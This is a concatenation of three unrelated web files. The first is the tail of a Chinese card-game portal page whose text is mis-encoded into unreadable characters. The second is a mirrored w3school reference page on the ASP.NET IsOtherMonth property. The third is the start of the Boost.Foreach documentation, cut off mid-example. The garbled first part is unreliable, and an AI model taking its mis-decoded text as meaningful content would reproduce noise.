<DL class=box_dl>
<DT>ÍÆ¼öÎÄÕÂ</DT>
<DD><a href="/qipai/qipaiyouxipingtai/2783.html">çÆÔÆÓÎÏ·ÖÐÐÄ ÈÎÄãåÛÓÎÆåÅÆÊÀ½ç</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2782.html">н®ÌìÉ½ÍøÓÎÏ·ÖÐÐĹÙÍø ×îºÃµÄ</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2781.html">ÐÂÀËÆåÅÆÖÐÐÄÏÂÔØ</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2780.html">½¨µÂÓÎÏ·ÖÐÐÄ_¿ÉÒÔÊÍ·ÅѹÁ¦µÄÆå</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2779.html">çÆÔÆÓÎÏ·ÖÐÐÄ_×îºÃµÄÆåÅÆÓÎϷƽ</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2778.html">¼Ñľ˹ÁúÓòÓÎÏ·ÖÐÐÄÏÂÔØ</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2777.html">1368ÆåÅÆÓÎϷƽ̨</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2776.html">°®ÆåÅÆÓÎÏ·ÖÐÐÄ£¬ÆåÅÆÀàÓÎÏ·°®ºÃ</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2775.html">½¨µÂÓÎÏ·ÖÐÐÄÊÖ»ú°æÏÂÔØ¸üºÃÍæ</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2774.html">789ÆåÅÆÓÎÏ·ÊÖ»ú°æÏÂÔØ</a> </DD>
</DL>
<DL class=box_dl>
<DT>×îÈÈÎÄÕÂ</DT>
<DD><a href="/qipai/qipaiyouxipingtai/17.html">°²»Õ±ß·æÓÎÏ·¶·µØÖ÷</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/365.html">»ªÏÄÆåÅÆÓÎÏ·</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/1156.html">Öйú»¥¶¯ÓÎÏ·ÖÐÐÄÓÎϷƽ̨-Öйú</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/1199.html">çÆÔÆÓÎÏ·ÖÐÐĵÄÓÎÏ·Íæ·¨</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/1240.html">psp¶·µØÖ÷µÄÌØµã</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/1834.html">¿ªÐĶ·µØÖ÷ÏÂÔØÊ±Òª×¢ÒâµÄÎÊÌâ</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/1926.html">ÁªÖÚ¶·µØÖ÷ÓÎÏ·ÄÜÓÐЧ»º½âѹÁ¦</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/1932.html">173ÓÎÏ·Íø£¬¸øÄã×îºÃµÄÓÎÏ·ÌåÑé</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2071.html">Ãæ¶ÔÃæµÄÊÓÆµ¶·µØÖ÷ÈÃÈËÃÇÓкõÄ</a> </DD>
<DD><a href="/qipai/qipaiyouxipingtai/2092.html">ºÃÍæµÄ²¶Óã´ïÈË3ÄÚ¹º1.0.7°æ±¾</a> </DD>
</DL>
</DIV>
</div>
<!--Ò³ÃæÓҲಿ·Ö ½áÊø -->
</div>
</div>
<DIV class=footer>
µÖÖÆ²»Á¼ÓÎÏ· ¾Ü¾øµÁ°æÓÎÏ· ×¢Òâ×ÔÎÒ±£»¤ ½÷·ÀÊÜÆÉϵ± ÊʶÈÓÎÏ·ÒæÄÔ ³ÁÃÔÓÎÏ·ÉËÉí ºÏÀí°²ÅÅʱ¼ä ÏíÊܽ¡¿µÉú»î <BR>
<a href="http://www.789game.com">789ÓÎÏ·ÖÐÐÄ</a>http://www.789game.com/ Ô¥ICP±¸12014032ºÅ-1
±¸°¸ÎĺÅ:ÎÄÍøÓα¸×Ö[2011]C-CBG002ºÅ<BR>¿Í·þQQ£º4000371814 ¿Í·þÈÈÏߣº4000371814 <script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fde6684532de22a1b45cd44b14141ff07' type='text/javascript'%3E%3C/script%3E"));
</script>
</DIV>
<style>
#banners {margin-top:-50px;}
#banners .hd {margin-top:-15px;width:100%;float:left;}
#banners .hd ul {width: 555px;z-index: 100; position: absolute; left: 45%; }
#banners .hd ul li {float: left; width: 11px; height: 11px; background-color: #fff; overflow: hidden; text-indent: -9999px; border-radius:6px;cursor:pointer; opacity: 0.5;filter: alpha(opacity=50); cursor: pointer;}
#banners .hd ul li.on {opacity: 1;filter: alpha(opacity=100);}
</style>
<div style="position:absolute;width:200px;top:340px;">
<div id="ad_right" style="position:fixed;width:142px;height:327px;z-index:8886;">
<a style="float:right;position:absolute;left:145px;margin-left:-20px;width:17px;height:17px;background:url(/qipai/templets/default/images/close1.png) no-repeat;z-index:8888;" id="closeleftbar" href="javascript:void(0);"></a>
<div class="leftLoops leftLoop1" style="z-index:8887" id="banners">
<div class="bd bd3">
<ul class="picLists">
<li>
<a href="http://www.789game.com/NewsShow.aspx?XID=439" target="_blank" style="width:100%;float:left;text-align:center;margin-top:50px;">
<img src="/qipai/templets/default/images/001leftQP.jpg" width="142" height="327" alt="" title="" /></a>
</a>
</li>
<li>
<a href="http://www.789game.com/NewsShow.aspx?XID=2006" target="_blank" style="width:100%;float:left;text-align:center;margin-top:50px;">
<img src="/qipai/templets/default/images/sh.jpg" width="142" height="327" alt="" title="" /></a>
</a>
</li>
</ul>
</div>
<div class="hd">
<ul></ul>
</div>
</div>
</div>
<script type="text/javascript" src="/qipai/templets/default/js/jquery.SuperSlide.js"></script>
<script type="text/javascript">
$(document).ready(function () {
$("#closeleftbar").click(function(){
$("#ad_right").css("display","none");
});
});
jQuery("#banners").slide({titCell:".hd ul",mainCell:".bd3 ul",effect:"leftLoop",autoPlay:true,autoPage:true,vis:1,scroll:1,trigger:"click",interTime:3000});</script>
<script type="text/javascript">
$(function() {
var sWidth = $("#lunbobg").width(); //»ñÈ¡½¹µãͼµÄ¿í¶È£¨ÏÔÊ¾Ãæ»ý£©
var len = $("#lunbobg ul li").length; //»ñÈ¡½¹µãͼ¸öÊý
var index = 0;
var picTimer;
//ÒÔÏ´úÂëÌí¼ÓÊý×Ö°´Å¥ºÍ°´Å¥ºóµÄ°ë͸Ã÷Ìõ£¬»¹ÓÐÉÏÒ»Ò³¡¢ÏÂÒ»Ò³Á½¸ö°´Å¥
var btn = "<div class='btnBg'></div><div class='btn'>";
for(var i=0; i < len; i++) {
btn += "<span></span>";
}
btn += "</div><div class='preNext pre'></div><div class='preNext next'></div>";
$("#lunbobg").append(btn);
$("#lunbobg .btnBg").css("opacity",0);
//ΪС°´Å¥Ìí¼ÓÊó±ê»¬Èëʼþ£¬ÒÔÏÔʾÏàÓ¦µÄÄÚÈÝ
$("#lunbobg .btn span").css("opacity",0.4).mouseover(function() {
index = $("#lunbobg .btn span").index(this);
showPics(index);
}).eq(0).trigger("mouseover");
//ÉÏÒ»Ò³¡¢ÏÂÒ»Ò³°´Å¥Í¸Ã÷¶È´¦Àí
$("#lunbobg .preNext").css("opacity",0.08).hover(function() {
$(this).stop(true,false).animate({"opacity":"0.5"},300);
},function() {
$(this).stop(true,false).animate({"opacity":"0.08"},300);
});
//ÉÏÒ»Ò³°´Å¥
$("#lunbobg .pre").click(function() {
index -= 1;
if(index == -1) {index = len - 1;}
showPics(index);
});
//ÏÂÒ»Ò³°´Å¥
$("#lunbobg .next").click(function() {
index += 1;
if(index == len) {index = 0;}
showPics(index);
});
//±¾ÀýΪ×óÓÒ¹ö¶¯£¬¼´ËùÓÐliÔªËØ¶¼ÊÇÔÚͬһÅÅÏò×󸡶¯£¬ËùÒÔÕâÀïÐèÒª¼ÆËã³öÍâΧulÔªËØµÄ¿í¶È
$("#lunbobg ul").css("width",sWidth * (len));
//Êó±ê»¬ÉϽ¹µãͼʱֹͣ×Ô¶¯²¥·Å£¬»¬³öʱ¿ªÊ¼×Ô¶¯²¥·Å
$("#lunbobg").hover(function() {
clearInterval(picTimer);
},function() {
picTimer = setInterval(function() {
showPics(index);
index++;
if(index == len) {index = 0;}
},3000); //´Ë4000´ú±í×Ô¶¯²¥·ÅµÄ¼ä¸ô£¬µ¥Î»£ººÁÃë
}).trigger("mouseleave");
//ÏÔʾͼƬº¯Êý£¬¸ù¾Ý½ÓÊÕµÄindexÖµÏÔʾÏàÓ¦µÄÄÚÈÝ
function showPics(index) { //ÆÕͨÇл»
var nowLeft = -index*sWidth; //¸ù¾ÝindexÖµ¼ÆËãulÔªËØµÄleftÖµ
$("#lunbobg ul").stop(true,false).animate({"left":nowLeft},300); //ͨ¹ýanimate()µ÷ÕûulÔªËØ¹ö¶¯µ½¼ÆËã³öµÄposition
$("#lunbobg .btn span").stop(true,false).animate({"opacity":"0.2"},300).eq(index).stop(true,false).animate({"opacity":"1"},300); //Ϊµ±Ç°µÄ°´Å¥Çл»µ½Ñ¡ÖеÄЧ¹û
}
});
</script>
</body>
</HTML>
|
Coding/W3School/W3CN/www.w3school.com.cn/aspnet/prop_webcontrol_calendarday_isothermonth.html | platinhom/ManualHom |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Mirrored from www.w3school.com.cn/aspnet/prop_webcontrol_calendarday_isothermonth.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 07:05:01 GMT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="zh-cn" />
<meta name="robots" content="all" />
<meta name="author" content="w3school.com.cn" />
<meta name="Copyright" content="Copyright W3school.com.cn All Rights Reserved." />
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta http-equiv="imagetoolbar" content="false" />
<link rel="stylesheet" type="text/css" href="../c5.css" />
<link rel="shortcut icon" href="../favicon.ico" type="image/x-icon" />
<title>ASP.NET IsOtherMonth 属性</title>
</head>
<body class="dotnet">
<div id="wrapper">
<div id="header">
<a href="../index-2.html" title="w3school 在线教程" style="float:left;">w3school 在线教程</a>
<div id="ad_head">
<script type="text/javascript"><!--
google_ad_client = "pub-3381531532877742";
/* 728x90, 创建于 08-12-1 */
google_ad_slot = "7423315034";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="../../pagead2.googlesyndication.com/pagead/f.txt">
</script>
</div>
</div>
<div id="navfirst">
<ul id="menu">
<li id="h"><a href="../h.html" title="HTML 系列教程">HTML 系列教程</a></li>
<li id="b"><a href="../b.html" title="浏览器脚本教程">浏览器脚本</a></li>
<li id="s"><a href="../s.html" title="服务器脚本教程">服务器脚本</a></li>
<li id="d"><a href="../d.html" title="ASP.NET 教程">ASP.NET 教程</a></li>
<li id="x"><a href="../x.html" title="XML 系列教程">XML 系列教程</a></li>
<li id="ws"><a href="../ws.html" title="Web Services 系列教程">Web Services 系列教程</a></li>
<li id="w"><a href="../w.html" title="建站手册">建站手册</a></li>
</ul>
</div>
<div id="navsecond">
<div id="course"><h2>ASP.NET 教程</h2>
<ul>
<li><a href="index.html" title="ASP.NET 教程">ASP.NET 教程</a></li>
<li><a href="aspnet.html" title="ASP.NET 简介">ASP.NET 简介</a></li>
</ul>
<h2>WP 教程</h2>
<ul>
<li><a href="webpages_intro.html" title="WebPages 简介">WebPages 简介</a></li>
<li><a href="webpages_razor.html" title="WebPages Razor">WebPages Razor</a></li>
<li><a href="webpages_layout.html" title="WebPages 布局">WebPages 布局</a></li>
<li><a href="webpages_folders.html" title="WebPages 文件夹">WebPages 文件夹</a></li>
<li><a href="webpages_global.html" title="WebPages 全局">WebPages 全局</a></li>
<li><a href="webpages_forms.html" title="WebPages 窗体">WebPages 窗体</a></li>
<li><a href="webpages_objects.html" title="WebPages 对象">WebPages 对象</a></li>
<li><a href="webpages_files.html" title="WebPages 文件">WebPages 文件</a></li>
<li><a href="webpages_helpers.html" title="WebPages 帮助器">WebPages 帮助器</a></li>
<li><a href="webpages_webgrid.html" title="WebPages WebGrid">WebPages WebGrid</a></li>
<li><a href="webpages_chart.html" title="WebPages 图表">WebPages 图表</a></li>
<li><a href="webpages_email.html" title="WebPages 电邮">WebPages 电邮</a></li>
<li><a href="webpages_php.html" title="WebPages PHP">WebPages PHP</a></li>
<li><a href="webpages_publish.html" title="WebPages 发布">WebPages 发布</a></li>
<li><a href="webpages_examples.html" title="WebPages 实例">WebPages 实例</a></li>
</ul>
<h2>WP 参考手册</h2>
<ul>
<li><a href="webpages_ref_classes.html" title="WebPages 类">WebPages 类</a></li>
<li><a href="webpages_ref_websecurity.asp" title="WebPages 安全">WebPages 安全</a></li>
<li><a href="webpages_ref_database.asp" title="WebPages 数据库">WebPages 数据库</a></li>
<li><a href="webpages_ref_webmail.html" title="WebPages WebMail">WebPages WebMail</a></li>
<li><a href="webpages_ref_helpers.asp" title="WebPages 助手">WebPages 助手</a></li>
</ul>
<h2>ASP.NET Razor</h2>
<ul>
<li><a href="razor_intro.html" title="Razor 简介">Razor 简介</a></li>
<li><a href="razor_syntax.html" title="Razor 语法">Razor 语法</a></li>
<li><a href="razor_cs_variables.html" title="Razor C# 变量">Razor C# 变量</a></li>
<li><a href="razor_cs_loops.html" title="Razor C# 循环">Razor C# 循环</a></li>
<li><a href="razor_cs_logic.html" title="Razor 外边距合并">Razor C# 逻辑</a></li>
<li><a href="razor_vb_variables.html" title="Razor VB 变量">Razor VB 变量</a></li>
<li><a href="razor_vb_loops.html" title="Razor VB 循环">Razor VB 循环</a></li>
<li><a href="razor_vb_logic.html" title="Razor VB 逻辑">Razor VB 逻辑</a></li>
</ul>
<h2>ASP.NET MVC</h2>
<ul>
<li><a href="mvc_intro.html" title="MVC 简介">MVC 简介</a></li>
<li><a href="mvc_app.html" title="MVC 应用程序">MVC 应用程序</a></li>
<li><a href="mvc_folders.html" title="MVC 文件夹">MVC 文件夹</a></li>
<li><a href="mvc_layout.html" title="MVC 布局">MVC 布局</a></li>
<li><a href="mvc_controllers.html" title="MVC 控制器">MVC 控制器</a></li>
<li><a href="mvc_views.asp" title="MVC 视图">MVC 视图</a></li>
<li><a href="mvc_database.html" title="MVC 数据库">MVC 数据库</a></li>
<li><a href="mvc_models.html" title="MVC 模型">MVC 模型</a></li>
<li><a href="mvc_security.html" title="MVC 安全">MVC 安全</a></li>
<li><a href="mvc_htmlhelpers.html" title="MVC HTML 助手">MVC HTML 助手</a></li>
<li><a href="mvc_publish.asp" title="MVC 发布">MVC 发布</a></li>
<li><a href="mvc_reference.html" title="MVC 参考手册">MVC 参考手册</a></li>
</ul>
<h2>WF 教程</h2>
<ul>
<li><a href="aspnet_intro.html" title="WebForms 简介">WebForms 简介</a></li>
<li><a href="aspnet_pages.html" title="WebForms Pages">WebForms Pages</a></li>
<li><a href="aspnet_controls.html" title="WebForms 控件">WebForms 控件</a></li>
<li><a href="aspnet_events.html" title="WebForms 事件">WebForms 事件</a></li>
<li><a href="aspnet_forms.html" title="WebForms 窗体">WebForms 窗体</a></li>
<li><a href="aspnet_viewstate.asp" title="WebForms ViewState">WebForms ViewState</a></li>
<li><a href="aspnet_textbox.asp" title="WebForms TextBox">WebForms TextBox</a></li>
<li><a href="aspnet_button.asp" title="WebForms Button">WebForms Button</a></li>
<li><a href="aspnet_databinding.html" title="WebForms Data Binding">WebForms 数据绑定</a></li>
<li><a href="aspnet_arraylist.html" title="WebForms ArrayList">WebForms ArrayList</a></li>
<li><a href="aspnet_hashtable.html" title="WebForms Hashtable">WebForms Hashtable</a></li>
<li><a href="aspnet_sortedlist.html" title="WebForms SortedList">WebForms SortedList</a></li>
<li><a href="aspnet_xml.html" title="WebForms XML 文件">WebForms XML 文件</a></li>
<li><a href="aspnet_repeater.html" title="WebForms Repeater">WebForms Repeater</a></li>
<li><a href="aspnet_datalist.html" title="WebForms DataList">WebForms DataList</a></li>
<li><a href="aspnet_dbconnection.html" title="WebForms DbConnection">WebForms 数据库连接</a></li>
<li><a href="aspnet_masterpages.html" title="WebForms Master Pages">WebForms 母版页</a></li>
<li><a href="aspnet_navigation.html" title="WebForms 导航">WebForms 导航</a></li>
<li><a href="aspnet_examples.html" title="WebForms 实例">WebForms 实例</a></li>
</ul>
<h2>WF 参考手册</h2>
<ul>
<li><a href="aspnet_refhtmlcontrols.html" title="WebForms HTML">WebForms HTML</a></li>
<li><a href="aspnet_refwebcontrols.asp" title="WebForms Controls">WebForms Controls</a></li>
<li><a href="aspnet_refvalidationcontrols.html" title="WebForms Validation">WebForms Validation</a></li>
</ul>
</div>
</div>
<div id="maincontent">
<h1>ASP.NET IsOtherMonth 属性</h1>
<div class="backtoreference">
<p><a href="control_calendarday.html" title="ASP.NET CalendarDay 控件">返回 ASP.NET CalendarDay 控件参考手册</a></p>
</div>
<div>
<h2>定义和用法</h2>
<p>IsOtherMonth 属性用于获取日期是否属于日历所显示的月份。</p>
<p>如果日期属于所显示的月份,则为 "FALSE",否则为 "TRUE"。</p>
</div>
<div>
<h2>实例</h2>
<p>下面的例子展示了被选日期是否属于当前月:</p>
<pre><script runat="server">
Sub DaySelect(obj As Object, e As DayRenderEventArgs)
If e.Day.IsSelected Then
If <code>e.Day.IsOtherMonth</code> = "TRUE" Then
Label1.Text = "NO"
Else
Label1.Text = "YES"
End If
End If
End Sub
</script>
<form runat="server">
<asp:Calendar id="cal1" runat="server"
OnDayRender="DaySelect"/>
The selected date is in the current month:
<asp:Label id="Label1" runat="server"/>
</form></pre>
</div>
<div class="example">
<h2>实例</h2>
<dl>
<dt>使用 IsOtherMonth 来展示被选日期是否属于当前月</dt>
</dl>
</div>
<div class="backtoreference">
<p><a href="control_calendarday.html" title="ASP.NET CalendarDay 控件">返回 ASP.NET CalendarDay 控件参考手册</a></p>
</div>
</div>
<div id="sidebar">
<div id="searchui">
<form method="get" id="searchform" action="http://www.google.com.hk/search">
<p><label for="searched_content">Search:</label></p>
<p><input type="hidden" name="sitesearch" value="w3school.com.cn" /></p>
<p>
<input type="text" name="as_q" class="box" id="searched_content" title="在此输入搜索内容。" />
<input type="submit" value="Go" class="button" title="搜索!" />
</p>
</form>
</div>
<div id="tools">
<h5 id="tools_reference"><a href="aspnet_reference.html">ASP.NET 参考手册</a></h5>
</div>
<div id="ad">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-3381531532877742";
/* sidebar-160x600 */
google_ad_slot = "3772569310";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>
<script type="text/javascript"
src="../../pagead2.googlesyndication.com/pagead/f.txt">
</script>
</div>
</div>
<div id="footer">
<p>
W3School 提供的内容仅用于培训。我们不保证内容的正确性。通过使用本站内容随之而来的风险与本站无关。W3School 简体中文版的所有内容仅供测试,对任何法律问题及风险不承担任何责任。
</p>
<p>
当使用本站时,代表您已接受了本站的<a href="../about/about_use.html" title="关于使用">使用条款</a>和<a href="../about/about_privacy.html" title="关于隐私">隐私条款</a>。版权所有,保留一切权利。
赞助商:<a href="http://www.yktz.net/" title="上海赢科投资有限公司">上海赢科投资有限公司</a>。
<a href="http://www.miitbeian.gov.cn/">蒙ICP备06004630号</a>
</p>
</div>
</div>
</body>
<!-- Mirrored from www.w3school.com.cn/aspnet/prop_webcontrol_calendarday_isothermonth.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 07:05:01 GMT -->
</html> |
boost/doc/html/foreach.html | geodynamics/gale | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Chapter 7. Boost.Foreach</title>
<link rel="stylesheet" href="../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="index.html" title="The Boost C++ Libraries BoostBook Documentation Subset">
<link rel="up" href="libraries.html" title="Part I. The Boost C++ Libraries (BoostBook Subset)">
<link rel="prev" href="boost/local_time/tz_database.html" title="Type definition tz_database">
<link rel="next" href="foreach/extensibility.html" title="Extensibility">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../boost.png"></td>
<td align="center"><a href="../../index.html">Home</a></td>
<td align="center"><a href="../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="boost/local_time/tz_database.html"><img src="../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="libraries.html"><img src="../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="index.html"><img src="../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="foreach/extensibility.html"><img src="../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="chapter">
<div class="titlepage"><div>
<div><h2 class="title">
<a name="foreach"></a>Chapter 7. Boost.Foreach</h2></div>
<div><div class="author"><h3 class="author">
<span class="firstname">Eric</span> <span class="surname">Niebler</span>
</h3></div></div>
<div><p class="copyright">Copyright © 2004 Eric Niebler</p></div>
<div><div class="legalnotice">
<a name="id1354723"></a><p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></div>
</div></div>
<div class="toc">
<p><b>Table of Contents</b></p>
<dl>
<dt><span class="section"><a href="foreach.html#foreach.introduction">Introduction</a></span></dt>
<dt><span class="section"><a href="foreach/extensibility.html">Extensibility</a></span></dt>
<dt><span class="section"><a href="foreach/portability.html">Portability</a></span></dt>
<dt><span class="section"><a href="foreach/pitfalls.html">Pitfalls</a></span></dt>
<dt><span class="section"><a href="foreach/history_and_acknowledgements.html">History and Acknowledgements</a></span></dt>
</dl>
</div>
<div class="section">
<div class="titlepage"><div><div><h2 class="title" style="clear: both">
<a name="foreach.introduction"></a><a class="link" href="foreach.html#foreach.introduction" title="Introduction">Introduction</a>
</h2></div></div></div>
<div class="blockquote"><blockquote class="blockquote"><p>
<span class="quote">“<span class="quote">Make simple things easy.</span>”</span><br> <span class="bold"><strong><span class="emphasis"><em>--
Larry Wall</em></span></strong></span>
</p></blockquote></div>
<a name="foreach.introduction.what_is__literal_boost_foreach__literal__"></a><h3>
<a name="foreach.introduction.what_is__literal_boost_foreach__literal__-heading"></a>
<a class="link" href="foreach.html#foreach.introduction.what_is__literal_boost_foreach__literal__">What
is <code class="literal">BOOST_FOREACH</code>?</a>
</h3>
<p>
In C++, writing a loop that iterates over a sequence is tedious. We can either
use iterators, which requires a considerable amount of boiler-plate, or we
can use the <code class="computeroutput"><span class="identifier">std</span><span class="special">::</span><span class="identifier">for_each</span><span class="special">()</span></code>
algorithm and move our loop body into a predicate, which requires no less boiler-plate
and forces us to move our logic far from where it will be used. In contrast,
some other languages, like Perl, provide a dedicated "foreach" construct
that automates this process. <code class="literal">BOOST_FOREACH</code> is just such
a construct for C++. It iterates over sequences for us, freeing us from having
to deal directly with iterators or write predicates.
</p>
<p>
<code class="literal">BOOST_FOREACH</code> is designed for ease-of-use and efficiency.
It does no dynamic allocations, makes no virtual function calls or calls through
function pointers, and makes no calls that are not transparent to the compiler's
optimizer. This results in near-optimal code generation; the performance of
<code class="literal">BOOST_FOREACH</code> is usually within a few percent of the equivalent
hand-coded loop. And although <code class="literal">BOOST_FOREACH</code> is a macro,
it is a remarkably well-behaved one. It evaluates its arguments exactly once,
leading to no nasty surprises.
</p>
<a name="foreach.introduction.hello__world_"></a><h3>
<a name="foreach.introduction.hello__world_-heading"></a>
<a class="link" href="foreach.html#foreach.introduction.hello__world_">Hello, world!</a>
</h3>
<p>
Below is a sample program that uses <code class="literal">BOOST_FOREACH</code> to loop
over the contents of a <code class="computeroutput"><span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span></code>.
</p>
<pre class="programlisting"><span class="preprocessor">#include</span> <span class="special"><</span><span class="identifier">string</span><span class="special">></span>
<span class="preprocessor">#include</span> <span class="special"><</span><span class="identifier">iostream</span><span class="special">></span>
<span class="preprocessor">#include</span> <span class="special"><</span><span class="identifier">boost</span><span class="special">/</span><span class="identifier">foreach</span><span class="special">.</span><span class="identifier">hpp</span><span class="special">></span>
<span class="keyword">int</span> <span class="identifier">main</span><span class="special">()</span>
<span class="special">{</span>
<span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <span class="identifier">hello</span><span class="special">(</span> <span class="string">"Hello, world!"</span> <span class="special">);</span>
<span class="identifier">BOOST_FOREACH</span><span class="special">(</span> <span class="keyword">char</span> <span class="identifier">ch</span><span class="special">,</span> <span class="identifier">hello</span> <span class="special">)</span>
<span class="special">{</span>
<span class="identifier">std</span><span class="special">::</span><span class="identifier">cout</span> <span class="special"><<</span> <span class="identifier">ch</span><span class="special">;</span>
<span class="special">}</span>
<span class="keyword">return</span> <span class="number">0</span><span class="special">;</span>
<span class="special">}</span>
</pre>
<p>
This program outputs the following:
</p>
<pre class="programlisting">Hello, world!
</pre>
<a name="foreach.introduction.supported_sequence_types"></a><h3>
<a name="foreach.introduction.supported_sequence_types-heading"></a>
<a class="link" href="foreach.html#foreach.introduction.supported_sequence_types">Supported Sequence
Types</a>
</h3>
<p>
<code class="literal">BOOST_FOREACH</code> iterates over sequences. But what qualifies
as a sequence, exactly? Since <code class="literal">BOOST_FOREACH</code> is built on
top of <a href="../../libs/range/index.html" target="_top">Boost.Range</a>, it automatically
supports those types which <a href="../../libs/range/index.html" target="_top">Boost.Range</a>
recognizes as sequences. Specifically, <code class="literal">BOOST_FOREACH</code> works
with types that satisfy the <a href="../../libs/range/doc/html/range/concepts/single_pass_range.html" target="_top">Single
Pass Range Concept</a>. For example, we can use <code class="literal">BOOST_FOREACH</code>
with:
</p>
<div class="itemizedlist"><ul class="itemizedlist" type="disc">
<li class="listitem">
STL containers
</li>
<li class="listitem">
arrays
</li>
<li class="listitem">
Null-terminated strings (<code class="computeroutput"><span class="keyword">char</span></code>
and <code class="computeroutput"><span class="keyword">wchar_t</span></code>)
</li>
<li class="listitem">
std::pair of iterators
</li>
</ul></div>
<div class="note"><table border="0" summary="Note">
<tr>
<td rowspan="2" align="center" valign="top" width="25"><img alt="[Note]" src="../../doc/src/images/note.png"></td>
<th align="left">Note</th>
</tr>
<tr><td align="left" valign="top"><p>
The support for STL containers is very general; anything that looks like
an STL container counts. If it has nested <code class="computeroutput"><span class="identifier">iterator</span></code>
and <code class="computeroutput"><span class="identifier">const_iterator</span></code> types
and <code class="computeroutput"><span class="identifier">begin</span><span class="special">()</span></code>
and <code class="computeroutput"><span class="identifier">end</span><span class="special">()</span></code>
member functions, <code class="literal">BOOST_FOREACH</code> will automatically know
how to iterate over it. It is in this way that <a href="../../libs/range/doc/html/range/reference/utilities/iterator_range.html" target="_top"><code class="computeroutput"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">iterator_range</span><span class="special"><></span></code></a>
and <a href="../../libs/range/doc/html/range/reference/utilities/sub_range.html" target="_top"><code class="computeroutput"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">sub_range</span><span class="special"><></span></code></a>
work with <code class="literal">BOOST_FOREACH</code>.
</p></td></tr>
</table></div>
<p>
See the section on <a class="link" href="foreach/extensibility.html" title="Extensibility">Extensibility</a>
to find out how to make <code class="literal">BOOST_FOREACH</code> work with other types.
</p>
<a name="foreach.introduction.examples"></a><h3>
<a name="foreach.introduction.examples-heading"></a>
<a class="link" href="foreach.html#foreach.introduction.examples">Examples</a>
</h3>
<p>
Below are some examples that demonstrate all the different ways we can use
<code class="literal">BOOST_FOREACH</code>.
</p>
<p>
Iterate over an STL container:
</p>
<pre class="programlisting"><span class="identifier">std</span><span class="special">::</span><span class="identifier">list</span><span class="special"><</span><span class="keyword">int</span><span class="special">></span> <span class="identifier">list_int</span><span class="special">(</span> <span class="comment">/*...*/</span> <span class="special">);</span>
<span class="identifier">BOOST_FOREACH</span><span class="special">(</span> <span class="keyword">int</span> <span class="identifier">i</span><span class="special">,</span> <span class="identifier">list_int</span> <span class="special">)</span>
<span class="special">{</span>
<span class="comment">// do something with i</span>
<span class="special">}</span>
</pre>
<p>
Iterate over an array, with covariance (i.e., the type of the iteration variable
is not exactly the same as the element type of the container):
</p>
<pre class="programlisting"><span class="keyword">short</span> <span class="identifier">array_short</span><span class="special">[]</span> <span class="special">=</span> <span class="special">{</span><span class="number">1</span><span class="special">,</span><span class="number">2</span><span class="special">,</span><span class="number">3</span><span class="special">};</span>
<span class="identifier">BOOST_FOREACH</span><span class="special">(</span> <span class="keyword">int</span> <span class="identifier">i</span><span class="special">,</span> <span class="identifier">array_short</span> <span class="special">)</span>
<span class="special">{</span>
<span class="comment">// The short was implicitly converted to an int</span>
<span class="special">}</span>
</pre>
<p>
Predeclare the loop variable, and use <code class="computeroutput"><span class="keyword">break</span></code>,
<code class="computeroutput"><span class="keyword">continue</span></code>, and <code class="computeroutput"><span class="keyword">return</span></code>
in the loop body:
</p>
<pre class="programlisting"><span class="identifier">std</span><span class="special">::</span><span class="identifier">deque</span><span class="special"><</span><span class="keyword">int</span><span class="special">></span> <span class="identifier">deque_int</span><span class="special">(</span> <span class="comment">/*...*/</span> <span class="special">);</span>
